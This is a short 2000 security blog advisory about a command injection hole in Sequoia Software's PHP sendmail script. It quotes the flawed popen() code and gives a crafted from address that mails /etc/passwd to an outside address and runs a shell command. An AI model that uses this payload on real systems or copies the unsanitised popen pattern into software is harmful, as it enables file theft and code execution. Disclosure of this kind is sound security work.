.
Bitland.Net Security Notes            Comments? email jwilkins-at-bitland*net
More information on the author at Jonathan Wilkins's home page
RSS feed available at http://www.bitland.net/index.rss               Add to Google
Archives: 2007, 2006, 2005, 2004, 2003, 2002, 2001, 2000
sequoiasoft's sendmail php script dangerous  |  (2000/11/09 12:00)

Written by Sequioa Software, this script allows execution of arbitrary code by a malicious user. Essentially, popen() executes a shell which does the actual interpretation of the command. If an attacker crafts their return email address carefully, then they can cause the popen() call to execute chosen commands or reveal files. 
//The workhorse method, does the actual sending of the mail.
//Doesn't check for errors so be careful!
function Send($sendmail = "/usr/sbin/sendmail") {
  if($this->from == "") {
    $fp = popen($sendmail . " -i " . $this->to, "w");
  } else {
    $fp = popen($sendmail . " -i -f"" . $this->from . "" " .
    $this->to, "w");
  }
Given the above code fragment, if I provide a from line such as: 
foo@bat.com" evil@mailinator.com < /etc/passwd; touch /tmp/gotcha;
I can have the contents of any file that the webserver account (usually nobody) has access to, and can execute commands as that user
+digg  |  +del.icio.us   |    [Security ]   |   Permanent link
RSS feed available at http://www.bitland.net/index.rss